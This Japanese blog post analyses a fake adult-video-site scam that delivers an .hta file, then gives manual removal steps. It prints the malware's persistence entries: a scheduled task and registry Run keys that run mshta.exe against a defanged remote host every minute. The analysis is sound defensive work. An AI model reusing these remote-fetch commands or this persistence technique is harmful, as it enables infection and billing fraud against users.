[請求画面消えない] EROSTAR Japanese Movies 有料アダルト動画サイト風ウイルス配信型ワンクリック詐欺


 ウイルス実行アカンッ! あなたが実行したのは、エッチなAV動画ファイルでも何でもなくウイルスですよ。


 ブラウザの警告通知場面で拡張子をちゃんとチェックしてない。動画の拡張子(.wmv、.aviなど)ではなく「.hta」だったはずです。これは実行ファイルに相当するので、デスクトップ画面に消えない料金請求入会登録の広告ポップ画像の表示、という感染症状を仕込んできます。 イメージ 1


『有料アダルトサイトへのご登録が完了しました』



タスクスケジューラ の上位フォルダに 4 つのデータを確認しました
(※テスト不足のため怪しさポイントは誤判定する可能性あり)


【タスク4】
名前: RegWriting
操作: C:\windows\system32\mshta.exe h**p://nobnen.info/set_inf2.php?cccid=uBrUYsyVbOdMP9F4t8xr54Xx3D3tcaMS
状態: 準備完了
繰り返し間隔: PT1M [1分]
作成者: (ユーザー名)
作成日時: 2011-12-**T11:25:00
怪しさ ⇒ 10 ポイント


【タスク3】
名前: GoogleUpdateTaskMachineUA
操作: C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler
状態: 無効
繰り返し間隔: PT3600S [3600秒]
作成者: (ユーザー名)
作成日時: (データなし)
怪しさ ⇒ 0 ポイント


【タスク2】
名前: GoogleUpdateTaskMachineCore
操作: C:\Program Files\Google\Update\GoogleUpdate.exe /c
状態: 無効
繰り返し間隔: (データなし)
作成者: (ユーザー名)
作成日時: (データなし)
怪しさ ⇒ 0 ポイント


【タスク1】
《無関係なため省略》


■ ■ ■ ■ ■ ■ ■ ■ ■ ■


レジストリ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run に
 2 つのデータを確認しました [2011/12/** 11:25]


【キー2】
名前: RegWriteuBrUYsyVbOdMP9F4t8xr54Xx3D3tcaMS
データ: C:\Users\[ユーザー名]\SoftRecovery\RegWriting.lnk
         └ C:\Windows\System32\mshta.exe h**p://nobnen.info/set_inf2.php?cccid=uBrUYsyVbOdMP9F4t8xr54Xx3D3tcaMS
怪しさ ⇒ 20 ポイント
更新日時 ⇒ .lnk ファイル要確認 2011/12/** 11:25:00


【キー1】
名前: SystemBootuBrUYsyVbOdMP9F4t8xr54Xx3D3tcaMS
データ: C:\Users\[ユーザー名]\UserProfile\SystemFile.lnk
         └ C:\Users\[ユーザー名]\UserProfile\htmlapp.exe h**p://nobnen.info/reg2.php?cccid=uBrUYsyVbOdMP9F4t8xr54Xx3D3tcaMS
怪しさ ⇒ 0 ポイント
更新日時 ⇒ .lnk ファイル要確認 2011/12/** 11:25:00


■ ■ ■ ■ ■ ■ ■ ■ ■ ■


OS環境: Windows 7
有料アダルト動画エロサイトの登録入会料金請求画面が消えない.exe v111217
http://blogs.yahoo.co.jp/noooo_spam/59949792.html


■ ■ ■ ■ ■ ■ ■ ■ ■ ■


[2012年1月追記...] 感染挙動が切り替わって、↑とは少々異なる新種ウイルスが配信されてるため新記事



  1. 診断結果の確認 【~が消えない.exe】

  2. [Windows Vista/7のみ] ウイルスにより登録された該当タスク1つを削除 【タスクスケジューラ

  3. ウイルスにより投下された該当の.linkファイル2つをゴミ箱へ 【ファイル検索、エクスプローラ】 ※

  4. ウイルスにより登録されたレジストリRunキーの該当項目2つを削除 【レジストリエディタ】 ※

  5. [スタート]→[すべてのプログラム]→[スタートアップ]の「RegWriting」または「RegWrite」をゴミ箱へ

  6. パソコンを再起動し反省会

※怪しさ判定が不完全(一方は20ポイントも、もう一方が0ポイント)なので、.lnkファイルの更新日時(=ウイルス実行日時)の一致で判断。こちらでは午前11時25分にウイルスを実行して感染させた形。 イメージ 2